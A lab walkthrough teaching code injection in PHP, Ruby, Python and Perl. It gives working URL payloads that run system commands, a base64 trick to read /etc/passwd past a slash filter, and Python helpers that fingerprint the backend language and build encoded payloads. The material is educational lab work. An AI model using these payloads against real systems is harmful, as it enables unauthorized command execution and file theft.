Code injection: Practically Explained



A code injection vulnerability lets an attacker supply input that the application evaluates as source code (PHP, Ruby, Python and Perl in the exercises below). Once arbitrary code runs, system-level commands follow through system(), backticks, os.popen() and similar calls, which is why it is often confused with command injection.

Scenario 1: Suppose we have a URL like the one below:
http://ptl-0f2be846-40a8fc58.libcurl.so/?name=hacker
We can try to break out of the string that the "hacker" value is placed in.
If we enter a double quote (") after the hacker value, it generates an error:
http://ptl-0f2be846-40a8fc58.libcurl.so/?name=hacker"
Parse error: syntax error, unexpected '!', expecting ',' or ';' in /var/www/index.php(16) : eval()'d code on line 1

Now close the string and reopen it so the statement parses again:

ptl-0f2be846-40a8fc58.libcurl.so/?name=hacker"."

The dot (.) is PHP's string concatenation operator: the first double quote closes the injected literal, the dot concatenates whatever follows, and the second double quote reopens the literal so the rest of the original statement still parses.

Now enter the following and the command is executed by the vulnerable application:

ptl-0f2be846-40a8fc58.libcurl.so/?name=hacker".system("uname")."


Conclusion: the first double quote (") after the hacker value closed the string literal; the dot (.) then concatenated another expression, system("uname"); the second dot and quote concatenated the remainder of the original statement, the three exclamation marks (!!!) that the application appends (the parse error above complained about exactly that '!').
The final payload is therefore:
ptl-0f2be846-40a8fc58.libcurl.so/?name=hacker".system("uname")."





Scenario 2: In this scenario the injection point is not a predefined PHP function but a function created at runtime: the errors below mention a "runtime-created function" used as the callback of usort(), which is what create_function() produces.


ptl-204b7868-65e32952.libcurl.so/?order=name
The page shows some records and lets the user sort them by a field.

If we enter a single quote (') after the name value, it throws an error:

ptl-204b7868-65e32952.libcurl.so/?order=name’


Parse error: syntax error, unexpected '',$b->name'' (T_CONSTANT_ENCAPSED_STRING) in /var/www/index.php(29) : runtime-created function on line 1

Warning: usort() expects parameter 2 to be a valid callback, no array or string given in /var/www/index.php on line 29

Now we need to complete the comparison function that usort() calls and append our payload after it.


http://ptl-204b7868-65e32952.libcurl.so/?order=name,1);}//
The URL above produces no errors: ",1)" completes the call inside the generated function body, ";}" ends that statement and closes the function early, and "//" comments out the rest of the generated code. Anything placed between the closing brace (}) and the comment (//) is therefore top-level code that runs when the function is created:

ptl-204b7868-65e32952.libcurl.so/?order=name,1);}system("uname");//


Conclusion: we completed the first function call (with its two arguments), closed the runtime-created function, added a second statement after it and commented out the leftover code; the statement was executed successfully.


Scenario 3:
The application uses PHP's preg_replace() function:
ptl-73845d63-ef7c8a1a.libcurl.so/?new=hacker&pattern=/lamer/&base=Hello lamer

new=hacker is the replacement string (what every match is replaced with).
pattern=/lamer/ is the regular expression to search for.
base=Hello lamer is the subject string the replacement is applied to.


So whenever the subject contains "lamer", it is replaced with "hacker".

The pattern is a regular expression, and adding the e modifier to it makes the application emit a notice. The /e modifier (deprecated in PHP 5.5 and removed in PHP 7.0) tells preg_replace() to eval() the replacement string as PHP code after the substitution; since our replacement is plain text, PHP treats "hacker" as an undefined constant:

ptl-73845d63-ef7c8a1a.libcurl.so/?new=hacker&pattern=/lamer/e&base=Hello lamer
Notice: Use of undefined constant hacker - assumed 'hacker' in /var/www/index.php(14) : regexp code on line 1
Hello hacker


Now that we know the e modifier makes the replacement string execute as PHP code, we can put a system command in the new parameter:

ptl-73845d63-ef7c8a1a.libcurl.so/?new=system("uname -a")&pattern=/lamer/e&base=Hello lamer



Scenario 4 : 
In this scenario we exploit PHP's assert() function: in PHP 5 a string passed to assert() is evaluated as PHP code (this string form was deprecated in PHP 7.2 and removed in 8.0).

ptl-ff6a2224-d5d1e049.libcurl.so/?name=hacker

After adding a single quote we get an error:

ptl-ff6a2224-d5d1e049.libcurl.so/?name=hacker'
Parse error: syntax error, unexpected '';' (T_ENCAPSED_AND_WHITESPACE) in /var/www/index.php(15) : assert code on line 1
Catchable fatal error: assert(): Failure evaluating code: 'hacker'' in /var/www/index.php on line 15

Now we need to close the string so the code parses again:

ptl-ff6a2224-d5d1e049.libcurl.so/?name=hacker'.'

That satisfies the parser, but there is nowhere to put our code yet, so concatenate an empty string in the middle:

ptl-ff6a2224-d5d1e049.libcurl.so/?name=hacker'.''.'

Now replace the empty string between the two dots with the command and exploit it:

ptl-ff6a2224-d5d1e049.libcurl.so/?name=hacker'.system("uname -a").'


Scenario 5:

This exercise is written entirely in Ruby.

http://ptl-b4ab717d-fa304237.libcurl.so/?username=hacker

If we add a double quote (") after the hacker value, it generates a Ruby error:

http://ptl-b4ab717d-fa304237.libcurl.so/?username=hacker"

Add + at the end, as Ruby uses + to concatenate strings:

http://ptl-b4ab717d-fa304237.libcurl.so/?username=hacker"+

To satisfy the statement, close the string and reopen it with an empty string concatenated in between:

http://ptl-b4ab717d-fa304237.libcurl.so/?username=hacker"+""+"

URL-encode the + sign as %2b, otherwise it is decoded as a space in the query string:

http://ptl-b4ab717d-fa304237.libcurl.so/?username=hacker"%2b""%2b"

To test, add some text in the middle:

http://ptl-b4ab717d-fa304237.libcurl.so/?username=hacker"%2b"test"%2b"

Output will be Hello hackertest

Ruby runs system commands with backticks (`...`) and returns their output as a string, so replace the empty string in the middle with a backtick command:

http://ptl-b4ab717d-fa304237.libcurl.so/?username=hacker"%2b`uname`%2b"

  

Scenario 6:

In this exercise I learned how to find out which language the application is written in, and then how to exploit the vulnerability.

We have a url like:
http://ptl-0965dda5-eea846ab.libcurl.so/hello/hacker
If we add a single quote ('), nothing changes:
Hello hacker'!

Give double quote ( “ )

http://ptl-0965dda5-eea846ab.libcurl.so/hello/hacker”
Internal Server Error
The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.

Add a dot (.) as the concatenation operator; it does not satisfy the parser:
ptl-0965dda5-eea846ab.libcurl.so/hello/hacker".""."

Add + as the concatenation operator instead; this satisfies it:
ptl-0965dda5-eea846ab.libcurl.so/hello/hacker"+""+"

Now URL-encode the + sign:
ptl-0965dda5-eea846ab.libcurl.so/hello/hacker"%2b""%2b"

Try entering text in between quotes and check the output
ptl-0965dda5-eea846ab.libcurl.so/hello/hacker"%2b"testcheck"%2b"
Hello hackertestcheck!

Remove the empty string in the middle and try Ruby's backtick syntax for running system commands (we do not yet know which language is used, so Ruby is the first guess):
ptl-0965dda5-eea846ab.libcurl.so/hello/hacker"%2b`uname`%2b"
Internal Server Error
The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.

 
Try a number without quotes:
ptl-0965dda5-eea846ab.libcurl.so/hello/hacker"%2b1%2b"
Internal Server Error
The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.

So the interpreter does not implicitly convert a number to a string when concatenating: it only joins strings with strings.
 
Now we try to convert the number into a string with Ruby syntax:
ptl-0965dda5-eea846ab.libcurl.so/hello/hacker"%2b1.to_s%2b"

1.to_s = converting 1 into string

Internal Server Error
The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.

So the backend is not Ruby.

Now try Python's way of converting a value to a string:
ptl-0965dda5-eea846ab.libcurl.so/hello/hacker"%2bstr(1)%2b"

str(1) = converts 1 into a string
This works and shows:

Hello hacker1!


This gives a directory listing (the os module is already imported in the application, so it can be used without importing it):

ptl-0965dda5-eea846ab.libcurl.so/hello/hacker"%2bstr(os.listdir("/"))%2b"
Hello hacker['dev', 'sys', 'lib64', 'home', 'lib', 'opt', 'etc', 'proc', 'var', 'mnt', 'boot', 'tmp', 'run', 'usr', 'bin', 'srv', 'sbin', 'root', 'media', '.dockerenv']!


This also gives output:
ptl-0965dda5-eea846ab.libcurl.so/hello/hacker"%2bstr(os.popen("ls").read())%2b"
Hello hackerapp.py app.pyc static templates !
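The language-fingerprinting steps above can be reproduced locally. The following is an added example, not code from the exercise or the original post: it assumes the handler splices the path value into the source text of a Python string literal and passes that text to eval() (a reconstruction, since the exercise's code is not shown), runs each probe from this scenario against it, and reports what the page would return or which exception the server would log. A hardened render_safe() is included for contrast.

```python
import os  # this scenario's payload used os without importing it: the app already had it

# Assumed reconstruction of the vulnerable handler (the example's own guess at
# the exercise's code, not its actual source): the name taken from the URL path
# is spliced into the source text of a Python string literal, and that source
# text is handed to eval().
def render_vulnerable(name: str) -> str:
    return eval('"Hello ' + name + '!"')

# Hardened version: the name is only ever data, never source text.
def render_safe(name: str) -> str:
    return "Hello {}!".format(name)

# The probes from the walkthrough, as raw path values (before URL-encoding).
PROBES = {
    "single_quote": "hacker'",                 # stays inside the literal: no error
    "double_quote": 'hacker"',                 # unbalanced literal: SyntaxError
    "php_perl_dot": 'hacker".""."',            # "." is attribute access in Python: SyntaxError
    "plus_concat":  'hacker"+""+"',            # "+" joins the pieces: renders normally
    "plus_text":    'hacker"+"testcheck"+"',   # proves the middle part is evaluated
    "plus_int":     'hacker"+1+"',             # str + int is not coerced: TypeError
    "ruby_to_s":    'hacker"+1.to_s+"',        # Ruby syntax, not Python: SyntaxError
    "python_str":   'hacker"+str(1)+"',        # Python: renders "Hello hacker1!"
    "os_name":      'hacker"+str(os.name)+"',  # works only because os is already imported
    "import_math":  'hacker"+str(__import__("math").floor(2.5))+"',  # no prior import needed
}

def probe(name: str) -> str:
    """Return what the page would show, or the exception class name the server would log."""
    try:
        return render_vulnerable(name)
    except Exception as exc:  # SyntaxError, TypeError, NameError ... all surface as HTTP 500
        return type(exc).__name__

def fingerprint() -> dict:
    """Run every probe; the pattern of outcomes is the language fingerprint."""
    return {label: probe(value) for label, value in PROBES.items()}

if __name__ == "__main__":
    for label, outcome in fingerprint().items():
        print(f"{label:13} -> {outcome}")
```

The dot probe fails for a different reason than the integer probe (a parse error versus a type error), which is why the walkthrough can tell "wrong concatenation operator" apart from "right operator, missing conversion" even though both come back as an Internal Server Error.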



Scenario 7:

Sometimes we need to import a module before the injected code can run.
This scenario shows how to exploit the vulnerability once the Python syntax is known and satisfied.

Follow all the steps of scenario 6 up to exploitation. Scenario 6 tells us that we are injecting into Python code, but here os is not available in the application's namespace, so before exploitation the payload has to import it itself with __import__('os').

The payloads below exploit it (%22 is the URL-encoded double quote):

http://ptl-13b66894-ae44fed9.libcurl.so/hello/hacker%22%2bstr(__import__('os').popen(%22ls%22).read())%2b%22


http://ptl-13b66894-ae44fed9.libcurl.so/hello/hacker%22%2bstr(__import__('os').listdir(%22/%22))%2b%22


Scenario 8:

Suppose the files are there but you cannot read them because part of the path is blocked by the application (here the forward slash).

You need to go through scenario 7 again, but the last step needs some more work.

1. http://ptl-13b66894-ae44fed9.libcurl.so/hello/hacker%22%2bstr(__import__('os').popen('uname%20-a').read())%2b%22

%2b = +
%22 = “


2.http://ptl-4bfb3882-622712e7.libcurl.so/hello/hacker%22%2bstr(__import__('os').popen(__import__('base64').b64decode('Y2F0ICcvZXRjL3Bhc3N3ZCc=')).read())%2b%22

In the URL above, cat '/etc/passwd' is base64-encoded and decoded again inside the payload, so no slash appears in the request.

Looking deeper, the direct payload was not working because the forward slash (/) was not allowed, most likely because the injected value is a URL path segment and a literal slash is taken as a path separator before it ever reaches the code. Even a double slash only worked once. So we need an approach where no forward slash is sent in the request, while the backend still ends up using it to fetch the data we want; base64 does exactly that.
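The slash problem and the base64 workaround of this scenario, as an added example that is not part of the original post or the exercise. It assumes the target rejects any "/" in the injected path segment and evaluates the value the way scenarios 6 and 7 showed (both are the example's own reconstruction), builds the payload the same way the URL above does, and adds two checks a practitioner would want: the base64 alphabet itself contains "/" and "+", so the encoded command is re-padded with harmless trailing spaces until it is clean, and the final URL is percent-encoded so the "+" is not decoded as a space.

```python
import base64
from urllib.parse import quote

# Assumed model of the target (the example's own reconstruction, not the
# exercise's code): the injected value is a URL path segment, so a literal "/"
# never reaches the application, and the value lands inside a Python string
# literal that is eval()'d, as in scenarios 6 and 7.
FORBIDDEN = frozenset("/")

def server_side(name: str) -> str:
    bad = FORBIDDEN & set(name)
    if bad:
        raise ValueError("not allowed in path segment: " + "".join(sorted(bad)))
    return eval('"Hello ' + name + '!"')

def smuggle(command: str, forbidden=FORBIDDEN) -> str:
    """Base64-encode a shell command so the encoded form avoids every forbidden byte.

    Standard base64 output can itself contain "/" and "+" (and "+" becomes a
    space if it ends up in a query string). Trailing whitespace does not change
    what the shell runs, so append spaces and re-encode until the output is clean.
    """
    for extra in range(64):
        encoded = base64.b64encode((command + " " * extra).encode()).decode()
        if not (set(encoded) & forbidden):
            return encoded
    raise ValueError("no clean encoding found for: " + command)

def build_payload(command: str) -> str:
    """The scenario-8 payload: decode the command on the server and run it via os.popen().

    .decode() is required on Python 3 because b64decode() returns bytes and
    os.popen() only accepts str; the walkthrough's payload omits it. The output
    is stripped so the trailing newline of the command does not end up in the page.
    """
    return ('hacker"+str(__import__("os").popen(__import__("base64")'
            '.b64decode("%s").decode()).read().strip())+"' % smuggle(command))

def build_url(host: str, command: str) -> str:
    """Percent-encode everything so that + and quotes survive the request (the %2b advice above)."""
    return "http://%s/hello/%s" % (host, quote(build_payload(command), safe=""))

def direct_attempt(command: str) -> str:
    """What happens when the command is put into the payload as-is."""
    try:
        return server_side('hacker"+str(__import__("os").popen("%s").read().strip())+"' % command)
    except ValueError:
        return "rejected"

def smuggled_attempt(command: str) -> str:
    """Same command, base64-wrapped: the request carries no slash, the shell still sees one."""
    return server_side(build_payload(command))

if __name__ == "__main__":
    print(direct_attempt("echo /etc"))     # rejected: the slash never gets through
    print(smuggled_attempt("echo /etc"))   # Hello hacker/etc!
    print(build_url("ptl-4bfb3882-622712e7.libcurl.so", "cat '/etc/passwd'"))
```

smuggle("cat '/etc/passwd'") happens to give the same Y2F0ICcvZXRjL3Bhc3N3ZCc= used in the URL above with no padding, but that is luck: a different command can encode to a string that contains "/" and would be rejected exactly like the plain payload, which is what the padding loop guards against.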


Scenario 9:

In this exercise the URL shown in the browser gives no error and no obvious place to inject the payload, so we inspected the request in a proxy and found something interesting.
Real URL: http://ptl-8e53ee3a-8496957a.libcurl.so/#hacker

URL in the request: http://ptl-8e53ee3a-8496957a.libcurl.so/cgi-bin/hello?name=hacker

Here the value sits in a single-quoted string in a Perl CGI script. The dot (.) is Perl's concatenation operator, so injecting '.''.' (close the string, concatenate an empty string, reopen it) satisfies the parser:

http://ptl-8e53ee3a-8496957a.libcurl.so/cgi-bin/hello?name=hacker%27.%27%27.%27


%27 = '

Perl, like Ruby, runs a system command with backticks and returns its output, so we replaced the empty string between the two dots with `uname -a`. The final payload looked like this:
http://ptl-8e53ee3a-8496957a.libcurl.so/cgi-bin/hello?name=hacker%27.`uname%20-a`.%27
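Across scenarios 1, 5, 6 and 9 the payload always has the same shape: close the literal the value sits in, concatenate the code with the language's operator, reopen the literal. The following added example (not from the original post or the exercises) encodes that as a small Python helper: it builds the probe and command payloads for the PHP, Perl, Ruby and Python cases above, percent-encodes them so the + survives the request, and turns the outcomes of the scenario 6 probes into the language guess the walkthrough arrives at. The language table is the example's own summary of what the scenarios observed, not an exhaustive reference.

```python
from urllib.parse import quote

# Delimiter and concatenation operator per language, as observed in the scenarios
# above. This table is the example's own summary, not part of the exercises.
LANGUAGES = {
    "php":    {"quote": '"', "concat": "."},
    "perl":   {"quote": "'", "concat": "."},
    "ruby":   {"quote": '"', "concat": "+"},
    "python": {"quote": '"', "concat": "+"},
}

def breakout(value: str, quote_char: str, concat: str, middle: str = None) -> str:
    """Close the literal the value sits in, splice `middle` in with the concat operator, reopen it.

    With no `middle` the spliced piece is an empty literal, which is the
    "satisfy the parser" probe used throughout the walkthrough.
    """
    if middle is None:
        middle = quote_char + quote_char
    return value + quote_char + concat + middle + concat + quote_char

def encode(raw: str) -> str:
    """Percent-encode for a query string or path segment: + becomes %2B, quotes and backticks too."""
    return quote(raw, safe="")

def probes(value: str = "hacker") -> dict:
    """The probe set from scenario 6, ready to paste into a URL."""
    return {
        "dot_concat":  encode(breakout(value, '"', ".")),
        "plus_concat": encode(breakout(value, '"', "+")),
        "ruby_to_s":   encode(breakout(value, '"', "+", "1.to_s")),
        "python_str":  encode(breakout(value, '"', "+", "str(1)")),
    }

def classify(rendered_ok: dict) -> set:
    """Scenario 6's decision procedure.

    rendered_ok maps a probe label to True if the page came back unchanged
    ("Hello hacker!") and False if it errored or changed. Probes not sent are
    simply absent and narrow nothing down.
    """
    candidates = set(LANGUAGES)
    if "dot_concat" in rendered_ok:
        candidates &= {"php", "perl"} if rendered_ok["dot_concat"] else {"ruby", "python"}
    if "plus_concat" in rendered_ok:
        candidates &= {"ruby", "python"} if rendered_ok["plus_concat"] else {"php", "perl"}
    if "ruby_to_s" in rendered_ok:
        candidates &= {"ruby"} if rendered_ok["ruby_to_s"] else candidates - {"ruby"}
    if "python_str" in rendered_ok:
        candidates &= {"python"} if rendered_ok["python_str"] else candidates - {"python"}
    return candidates

def command_payload(language: str, command: str, value: str = "hacker") -> str:
    """The final payloads of scenarios 1, 5, 6/7 and 9: the command spliced into the literal."""
    spec = LANGUAGES[language]
    middle = {
        "php":    'system("%s")' % command,
        "perl":   "`%s`" % command,
        "ruby":   "`%s`" % command,
        "python": 'str(__import__("os").popen("%s").read())' % command,
    }[language]
    return breakout(value, spec["quote"], spec["concat"], middle)

if __name__ == "__main__":
    for label, url_value in probes().items():
        print(f"{label:12} {url_value}")
    observed = {"dot_concat": False, "plus_concat": True, "ruby_to_s": False, "python_str": True}
    print("language:", classify(observed))
    for lang in LANGUAGES:
        print(f"{lang:7} {command_payload(lang, 'uname -a')}")
```

The helper only knows the quoting context the scenarios showed (a double-quoted literal for PHP, Ruby and Python, a single-quoted one for Perl); when the first probe errors in a new target, try the other delimiter before concluding anything about the language.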
